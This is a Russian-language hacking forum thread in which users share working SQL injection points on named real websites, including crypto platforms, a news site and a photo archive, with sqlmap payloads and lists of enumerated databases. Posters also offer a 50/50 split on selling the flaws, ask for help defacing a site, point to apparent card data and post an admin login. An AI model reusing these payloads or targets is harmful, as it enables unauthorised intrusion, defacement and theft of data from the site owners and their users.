Найденные интересеные SQL inj & XSS

[bingrez]

Беру под процент уязвимости
50% ваши
50% мои
суммы разные(зависит естественно от ресурса)

Такого плана

Parameter: #1* (URI)
Type:
Title:
Payload
---
available databases []:

 

[vally-hood]

https://www.binanceaut0trade.com/

admin@gmail.com:admin


POST /login.php HTTP/1.1
Content-Length: 91
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://binanceaut0trade.com/
Cookie: PHPSESSID=98647af8071405e25ef5d36d4079c152
Host: binanceaut0trade.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

login_user=LOGIN&f1=1&f2=1




Parameter: f1 (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
Payload: login_user=LOGIN&f1=1' OR NOT 5747=5747-- kUrV&f2=1

Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: login_user=LOGIN&f1=1' OR (SELECT 4654 FROM(SELECT COUNT(*),CONCAT(0x7178767071,(SELECT (ELT(4654=4654,1))),0x7171787a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- iAuz&f2=1

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: login_user=LOGIN&f1=1' AND (SELECT 3846 FROM (SELECT(SLEEP(5)))LNIt)-- aeGk&f2=1
---
[20:23:35] [INFO] the back-end DBMS is MySQL
web application technology: LiteSpeed
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[20:23:38] [INFO] fetching database names
[20:23:39] [INFO] starting 2 threads
[20:23:40] [INFO] retrieved: 'information_schema'
[20:23:40] [INFO] retrieved: 'primewa1_binanceautotrade'
available databases [2]:
[*] information_schema
[*] primewa1_binanceautotrade

 

[vally-hood]

https://www.moneycontrol.com/ есть приложения свои более 10кк установок


GET /covid19-quiz-1'%22 HTTP/1.1
Referer: https://www.moneycontrol.com/
Cookie: PHPSESSID=3e2f7e11074338a17e0a4914c07ccbfc; subcat0=all; GC_TRACK_SUB=LAND
Host: www.moneycontrol.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

 

[xanthopsia]

Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
Payload: https://www.celojumubode.lv:443/lv/celojumi?turisma=' AND 8175=(SELECT (CASE WHEN (8175=8175) THEN 8175 ELSE (SELECT 4425 UNION SELECT 1146) END))-- -

Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: https://www.celojumubode.lv:443/lv/celojumi?turisma=' AND GTID_SUBSET(CONCAT(0x7162717a71,(SELECT (ELT(3353=3353,1))),0x71786a6271),3353)-- Xofe

Type: stacked queries
Title: MySQL >= 5.0.12 stacked queries
Payload: https://www.celojumubode.lv:443/lv/celojumi?turisma=';SELECT SLEEP(5)-- YYcF

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: https://www.celojumubode.lv:443/lv/celojumi?turisma=' AND (SELECT 3974 FROM (SELECT(SLEEP(5)))Teyh)-- SeUx

DBA : +

буду благодарен, если кто-нить поможет дефейснуть

 

[vally-hood]

InvestmentCrypto

crypto.daani.it

POST /Account/signup HTTP/1.1
Content-Length: 807
Content-Type: application/x-www-form-urlencoded
Cookie: ASP.NET_SessionId=bfjb0ct1a5djaxyiy1stmvx0; __RequestVerificationToken=qQTtVKMWRNkWXt7lzyhnO031K5AQlJtve_a2owAe6lr5bK36GMlyJXBX2iPqBZ25WSH3vSii-tZn8N4qEZTORvLuDKinY3m4L3OoYyhUzJb2B-k4s1MTA7Gg98No588GCs4Vd4jvQpF9n0eekFApKA2; cntrlr=Account
Host: crypto.daani.it
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

LoginButton=REGISTER%20ME&AddressLine1=3137%20Laguna%20Street&chk=1&CityName=lqsrvbwm&ConfirmPassword=g00dPa%24%24w0rD&CountryId=1&DOB=1967/1/1&eMail=sample%40email.tst&FirstName=lqsrvbwm&GenderFemale=F&GenderMale=M&LastName=lqsrvbwm&MainPassword=g00dPa%24%24w0rD&MobileNo=987-65-4329&PinNumber=&PostalCode=94102&SponsorId=1&SponsorName=lqsrvbwm&SSNNo=987-65-4329&StateName=lqsrvbwm&UserName=lqsrvbwm&webUrl=http://www.vulnweb.com&__RequestVerificationToken=X8jv1vS146Oqz8OASxFDTNnioU5zvPvKCcVlim5qr90mobadVJ72zI1Rb_WZx7ULsx2fMX4mr-3gA0u0dAdRD9aWfDYGBXgxudVWbtvNr_gfxvWYY5AbvzR7UYkBNW_IclGywE90f-Oxqz8oIy8gVXVyUhbX09hx1PnU8RQulQg1




Parameter: SponsorId (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: LoginButton=REGISTER ME&AddressLine1=3137 Laguna Street&chk=1&CityName=lqsrvbwm&ConfirmPassword=g00dPa$$w0rD&CountryId=1&DOB=1967/1/1&eMail=sample@email.tst&FirstName=lqsrvbwm&GenderFemale=F&GenderMale=M&LastName=lqsrvbwm&MainPassword=g00dPa$$w0rD&MobileNo=987-65-4329&PinNumber=&PostalCode=94102&SponsorId=-7537' OR 7360=7360-- iiqg&SponsorName=lqsrvbwm&SSNNo=987-65-4329&StateName=lqsrvbwm&UserName=lqsrvbwm&webUrl=http://www.vulnweb.com&__RequestVerificationToken=X8jv1vS146Oqz8OASxFDTNnioU5zvPvKCcVlim5qr90mobadVJ72zI1Rb_WZx7ULsx2fMX4mr-3gA0u0dAdRD9aWfDYGBXgxudVWbtvNr_gfxvWYY5AbvzR7UYkBNW_IclGywE90f-Oxqz8oIy8gVXVyUhbX09hx1PnU8RQulQg1

Type: error-based
Title: Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (IN)
Payload: LoginButton=REGISTER ME&AddressLine1=3137 Laguna Street&chk=1&CityName=lqsrvbwm&ConfirmPassword=g00dPa$$w0rD&CountryId=1&DOB=1967/1/1&eMail=sample@email.tst&FirstName=lqsrvbwm&GenderFemale=F&GenderMale=M&LastName=lqsrvbwm&MainPassword=g00dPa$$w0rD&MobileNo=987-65-4329&PinNumber=&PostalCode=94102&SponsorId=-9559' OR 5902 IN (SELECT (CHAR(113)+CHAR(118)+CHAR(118)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (5902=5902) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(122)+CHAR(113)+CHAR(113)))-- BkrH&SponsorName=lqsrvbwm&SSNNo=987-65-4329&StateName=lqsrvbwm&UserName=lqsrvbwm&webUrl=http://www.vulnweb.com&__RequestVerificationToken=X8jv1vS146Oqz8OASxFDTNnioU5zvPvKCcVlim5qr90mobadVJ72zI1Rb_WZx7ULsx2fMX4mr-3gA0u0dAdRD9aWfDYGBXgxudVWbtvNr_gfxvWYY5AbvzR7UYkBNW_IclGywE90f-Oxqz8oIy8gVXVyUhbX09hx1PnU8RQulQg1

Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: LoginButton=REGISTER ME&AddressLine1=3137 Laguna Street&chk=1&CityName=lqsrvbwm&ConfirmPassword=g00dPa$$w0rD&CountryId=1&DOB=1967/1/1&eMail=sample@email.tst&FirstName=lqsrvbwm&GenderFemale=F&GenderMale=M&LastName=lqsrvbwm&MainPassword=g00dPa$$w0rD&MobileNo=987-65-4329&PinNumber=&PostalCode=94102&SponsorId=1';WAITFOR DELAY '0:0:5'--&SponsorName=lqsrvbwm&SSNNo=987-65-4329&StateName=lqsrvbwm&UserName=lqsrvbwm&webUrl=http://www.vulnweb.com&__RequestVerificationToken=X8jv1vS146Oqz8OASxFDTNnioU5zvPvKCcVlim5qr90mobadVJ72zI1Rb_WZx7ULsx2fMX4mr-3gA0u0dAdRD9aWfDYGBXgxudVWbtvNr_gfxvWYY5AbvzR7UYkBNW_IclGywE90f-Oxqz8oIy8gVXVyUhbX09hx1PnU8RQulQg1

Type: time-based blind
Title: Microsoft SQL Server/Sybase time-based blind (IF)
Payload: LoginButton=REGISTER ME&AddressLine1=3137 Laguna Street&chk=1&CityName=lqsrvbwm&ConfirmPassword=g00dPa$$w0rD&CountryId=1&DOB=1967/1/1&eMail=sample@email.tst&FirstName=lqsrvbwm&GenderFemale=F&GenderMale=M&LastName=lqsrvbwm&MainPassword=g00dPa$$w0rD&MobileNo=987-65-4329&PinNumber=&PostalCode=94102&SponsorId=1' WAITFOR DELAY '0:0:5'-- GCeM&SponsorName=lqsrvbwm&SSNNo=987-65-4329&StateName=lqsrvbwm&UserName=lqsrvbwm&webUrl=http://www.vulnweb.com&__RequestVerificationToken=X8jv1vS146Oqz8OASxFDTNnioU5zvPvKCcVlim5qr90mobadVJ72zI1Rb_WZx7ULsx2fMX4mr-3gA0u0dAdRD9aWfDYGBXgxudVWbtvNr_gfxvWYY5AbvzR7UYkBNW_IclGywE90f-Oxqz8oIy8gVXVyUhbX09hx1PnU8RQulQg1

Type: UNION query
Title: Generic UNION query (NULL) - 50 columns
Payload: LoginButton=REGISTER ME&AddressLine1=3137 Laguna Street&chk=1&CityName=lqsrvbwm&ConfirmPassword=g00dPa$$w0rD&CountryId=1&DOB=1967/1/1&eMail=sample@email.tst&FirstName=lqsrvbwm&GenderFemale=F&GenderMale=M&LastName=lqsrvbwm&MainPassword=g00dPa$$w0rD&MobileNo=987-65-4329&PinNumber=&PostalCode=94102&SponsorId=1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(118)+CHAR(118)+CHAR(112)+CHAR(113)+CHAR(109)+CHAR(73)+CHAR(114)+CHAR(85)+CHAR(98)+CHAR(82)+CHAR(119)+CHAR(72)+CHAR(84)+CHAR(76)+CHAR(98)+CHAR(114)+CHAR(86)+CHAR(81)+CHAR(102)+CHAR(75)+CHAR(106)+CHAR(117)+CHAR(106)+CHAR(122)+CHAR(89)+CHAR(117)+CHAR(111)+CHAR(67)+CHAR(89)+CHAR(104)+CHAR(77)+CHAR(109)+CHAR(79)+CHAR(67)+CHAR(83)+CHAR(119)+CHAR(102)+CHAR(102)+CHAR(85)+CHAR(104)+CHAR(104)+CHAR(100)+CHAR(108)+CHAR(84)+CHAR(113)+CHAR(106)+CHAR(122)+CHAR(113)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- OJPY&SponsorName=lqsrvbwm&SSNNo=987-65-4329&StateName=lqsrvbwm&UserName=lqsrvbwm&webUrl=http://www.vulnweb.com&__RequestVerificationToken=X8jv1vS146Oqz8OASxFDTNnioU5zvPvKCcVlim5qr90mobadVJ72zI1Rb_WZx7ULsx2fMX4mr-3gA0u0dAdRD9aWfDYGBXgxudVWbtvNr_gfxvWYY5AbvzR7UYkBNW_IclGywE90f-Oxqz8oIy8gVXVyUhbX09hx1PnU8RQulQg1
---
[13:31:53] [INFO] testing Microsoft SQL Server
[13:31:53] [INFO] confirming Microsoft SQL Server
[13:31:54] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 10 or 2016 or 2019
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 10.0
back-end DBMS: Microsoft SQL Server 2019
[13:31:54] [INFO] fetching database names
available databases [16]:
[*] DAANIBudget21
[*] daanidirectselling21
[*] DaaniDoctor
[*] DaaniEComm21
[*] DAANILiveDB
[*] DAANIMLM21
[*] daaniviccion
[*] demoaffiliate20
[*] demodaxx
[*] DemoHelp
[*] demowebsitecms
[*] master
[*] model
[*] msdb
[*] MyOnlineStore21
[*] tempdb


ничего не трогал забирайте,есть cc как я понял

 

[vally-hood]

multibux.org

sqlmap identified the following injection point(s) with a total of 905 HTTP(s) requests:
---
Parameter: MULTIPART selected_topics[] ((custom) POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
Payload: ------------YWJkMTQzNDcw
Content-Disposition: form-data; name="ctr"

0;100
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="hosts"

-1;99999
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="motive"

2
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="price"

0;10000
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="selected_topics[]"

1) AND 8750=(SELECT (CASE WHEN (8750=8750) THEN 8750 ELSE (SELECT 3262 UNION SELECT 8088) END))-- -
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="size"

1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="token_hash"

ad4c41c4cc598c5ba13a839c84bfbbea
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="type"

search
------------YWJkMTQzNDcw--

Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: ------------YWJkMTQzNDcw
Content-Disposition: form-data; name="ctr"

0;100
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="hosts"

-1;99999
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="motive"

2
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="price"

0;10000
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="selected_topics[]"

1) AND GTID_SUBSET(CONCAT(0x717a6b6271,(SELECT (ELT(5566=5566,1))),0x7162766a71),5566)-- WQAv
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="size"

1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="token_hash"

ad4c41c4cc598c5ba13a839c84bfbbea
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="type"

search
------------YWJkMTQzNDcw--

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: ------------YWJkMTQzNDcw
Content-Disposition: form-data; name="ctr"

0;100
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="hosts"

-1;99999
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="motive"

2
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="price"

0;10000
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="selected_topics[]"

1) AND (SELECT 7426 FROM (SELECT(SLEEP(5)))izbe)-- UMzV
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="size"

1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="token_hash"

ad4c41c4cc598c5ba13a839c84bfbbea
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="type"

search
------------YWJkMTQzNDcw--
---
[22:54:32] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.6
[22:54:35] [INFO] fetching database names
[22:54:36] [INFO] starting 2 threads
[22:54:36] [INFO] retrieved: 'admin_multibase123'
[22:54:37] [INFO] retrieved: 'information_schema'
available databases [2]:
[*] admin_multibase123
[*] information_schema

 

[totulov45]

Account Suspended

---
Parameter: job_id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: job_id=129 AND 1248=1248
---

[10:13:42] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.0
[10:13:45] [INFO] fetching database names
[10:13:45] [INFO] fetching number of databases
[10:13:45] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[10:13:45] [INFO] retrieved: 2
[10:13:54] [INFO] retrieved: information_schema
[10:16:23] [INFO] retrieved: agradgdu_cloudexperts
available databases [2]:
[*] agradgdu_cloudexperts
[*] information_schema

 

[totulov45]

RI Connections - SERVIÇOS DE ENGENHARIA AMBIENTAL E SEGURANÇA DO TRABALHO

Parameter: service (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: servico=316' AND 8009=8009 AND 'evLT'='evLT

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: servico=316' AND (SELECT 6165 FROM(SELECT COUNT(*),CONCAT(0x717a6b7871,(SELECT (ELT(6165=6165,1))),0x7170767671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'QVNE'='QVNE

Type: stacked queries
Title: MySQL >= 5.0.12 stacked queries (comment)
Payload: servico=316';SELECT SLEEP(5)#

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: servico=316' AND (SELECT 8138 FROM (SELECT(SLEEP(5)))ocPd) AND 'ywau'='ywau

Type: UNION query
Title: MySQL UNION query (NULL) - 1 column
Payload: servico=-4925' UNION ALL SELECT CONCAT(0x717a6b7871,0x776e616d514477746b466b6e4d6f4b6a78544848536857576e414a6954704b565369704b484c505a,0x717076
---
[15:38:12] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[15:38:12] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[15:38:19] [INFO] fetching database names
[15:38:36] [INFO] retrieved: 'information_schema'
[15:38:45] [INFO] retrieved: 'nexuscod_negocios'

available databases [2]:
[*] information_schema
[*] nexuscod_negocios

 

[UltraS22]

Друзья, не могли бы поделится в лс иньекциями, я только начинаю изучать материал, хотелось бы практики

 

[Duble]

Друзья, не могли бы поделится в лс иньекциями, я только начинаю изучать материал, хотелось бы практики

В теме полно.

 

[vally-hood]

sunteccoin.io

POST /forget-pass HTTP/1.1
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: https://sunteccoin.io/
Cookie: __pixel__sun=gahj9h2br8p7bidov9ldrtdgj9f1ac66
Content-Length: 68
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4512.0 Safari/537.36
Host: sunteccoin.io
Connection: Keep-alive

u_email=1

Parameter: u_email (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
Payload: u_email=1') OR NOT 4593=4593-- SVUU

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: u_email=1') AND (SELECT 9098 FROM (SELECT(SLEEP(5)))RyET)-- tdhm
---

[22:15:21] [INFO] the back-end DBMS is MySQL
web application technology: Nginx
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
available databases [2]:
[*] information_schema
[*] sunteccoin_token

 

[vally-hood]

crypto5color.com


POST /fetch.php?sponsorid=1 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://165.232.190.253/
Cookie: PHPSESSID=rv39094p9uhmtc682a1id5gvrl; drift_campaign_refresh=134a0a7e-a3ac-4106-81b3-48d32202c2bd
Content-Length: 0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4512.0 Safari/537.36
Host: 165.232.190.253
Connection: Keep-alive


Parameter: sponsorid (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: sponsorid=-2796' OR 8338=8338-- WhNY

Type: stacked queries
Title: MySQL >= 5.0.12 stacked queries (query SLEEP)
Payload: sponsorid=1';(SELECT * FROM (SELECT(SLEEP(5)))EEYP)-- ydmo

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: sponsorid=1' AND (SELECT 1929 FROM (SELECT(SLEEP(5)))XhUb)-- JmIP

Type: UNION query
Title: Generic UNION query (random number) - 67 columns
Payload: sponsorid=1' UNION ALL SELECT 2921,2921,CONCAT(0x716b627871,0x4b7864594459657451454f494c41684d7169584d4f4e4f50494f45446d6a544a4f4444545446476d,0x7178626a71),2921,2921,2921,2921,2921,2921,2921,2921,2921,2921,2921,2921,2921,2921,2921,2921,2921,2921,2921,2921,2921,2921,2921,2921,2921,2921,2921,2921,2921,2921,2921,2921,2921,2921,2921,2921,2921,2921,2921,2921,2921,2921,2921,2921,2921,2921,2921,2921,2921,2921,2921,2921,2921,2921,2921,2921,2921,2921,2921,2921,2921,2921,2921,2921-- -
---
[02:53:59] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 20.10 or 20.04 or 19.10 (eoan or focal)
web application technology: Apache 2.4.41
back-end DBMS: MySQL >= 5.0.12
[02:54:01] [INFO] fetching database names
available databases [9]:
[*] crypto
[*] information_schema
[*] mrs
[*] mysql
[*] performance_schema
[*] rfmpl
[*] sys
[*] unique
[*] ww

 

[nieckz]

that's a funny one

 

[Duble]

Web Shell

 

[vally-hood]

www.winningstracker.com

GET /about/1* HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: https://www.winningstracker.com/
Cookie: PHPSESSID=cm90tdh4uc72a0n4686o6icql5; sc_is_visitor_unique=rx12470881.1648043546.985F1C5EFA3E4FFE6B5AC0DCF67EA1EE.1.1.1.1.1.1.1.1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4512.0 Safari/537.36
Host: www.winningstracker.com
Connection: Keep-alive

Parameter: #1* (URI)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: http://www.winningstracker.com:80/about/-5351' OR 7726=7726-- QxfM

Type: time-based blind
Title: MySQL >= 5.0.12 OR time-based blind (SLEEP)
Payload: http://www.winningstracker.com:80/about/1' OR SLEEP(5)-- xIHd

Type: UNION query
Title: Generic UNION query (random number) - 6 columns
Payload: http://www.winningstracker.com:80/about/1' UNION ALL SELECT 3752,3752,3752,3752,CONCAT(0x716a767671,0x417177687167556b4865475a6a73714653564672475a664f476947615672774147564e495761484c,0x717a7a7671),3752-- -

available databases [1]:
[*] winnings_tracker

 

[ZzZ505ZzZ]

https://zd-bileti.ru/srp/a'a%5C'b%22c%3E%3F%3E%25%7D%7D%25%25%3Ec%3C[[%3F$%7B%7B%25%7D%7Dcake%5C/20032022

https://zd-bileti.ru/srp/Filonovo-Filonovo/'%20OR%201=1--%22

Никак не могу пробить базу, с Maria не работал

 

[lohatnikov]

https://zd-bileti.ru/srp/a'a%5C'b%22c%3E%3F%3E%25%7D%7D%25%25%3Ec%3C[[%3F$%7B%7B%25%7D%7Dcake%5C/20032022

Посмотреть вложение 34284

https://zd-bileti.ru/srp/Filonovo-Filonovo/'%20OR%201=1--%22

Никак не могу пробить базу, с Maria не работал

кто работает по ру - к тому приходят по утру

 

[ZzZ505ZzZ]

кто работает по ру - к тому приходят по утру

Тут достаточно ру выкладывали. И это не работа по ру

 

[ZzZ505ZzZ]

http://photoarchive.mk.ru/showim.asp?id=269276

```
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=269276 AND 3703=3703

Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)
Payload: id=269276 AND 6115 IN (SELECT (CHAR(113)+CHAR(106)+CHAR(113)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (6115=6115) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(120)+CHAR(122)+CHAR(113)))

Type: inline query
Title: Microsoft SQL Server/Sybase inline queries
Payload: id=(SELECT CHAR(113)+CHAR(106)+CHAR(113)+CHAR(98)+CHAR(113)+(CASE WHEN (2007=2007) THEN CHAR(49) ELSE CHAR(48) END)+CHAR(113)+CHAR(122)+CHAR(120)+CHAR(122)+CHAR(113))

Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: id=269276;WAITFOR DELAY '0:0:5'--



available databases [57]:
[*] Archiv
[*] Child
[*] Classifieds
[*] Conkurs
[*] DACHA
[*] Dance
[*] Distribution
[*] Dossier
[*] Ege
[*] Euro2008
[*] Football
[*] GLOBAL
[*] gonor
[*] Happy
[*] Intershop
[*] KAZ
[*] Kino2006
[*] Kino2007
[*] Kino2008
[*] Klass
[*] master
```

 

[totulov45]

Apparel Shopping Site

Online community for Party

Retail and wholesale of name brand apparel including t-shirt, fleece, outerwear, pants, sweater, headwear, bags, and accessories with screenprinting and embroidery services.

www.nyfifth.com

---
Parameter: ttype (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
Payload: ttype=0 OR NOT 7943=7943

Type: time-based blind
Title: MySQL >= 5.0.12 OR time-based blind (SLEEP)
Payload: ttype=0 OR SLEEP(5)

Web application technology: PHP 5.2.17, Apache 2.4.23
Back-end DBMS: MySQL >= 5.0.12

available databases [1]:
[*] nyfifth_hr2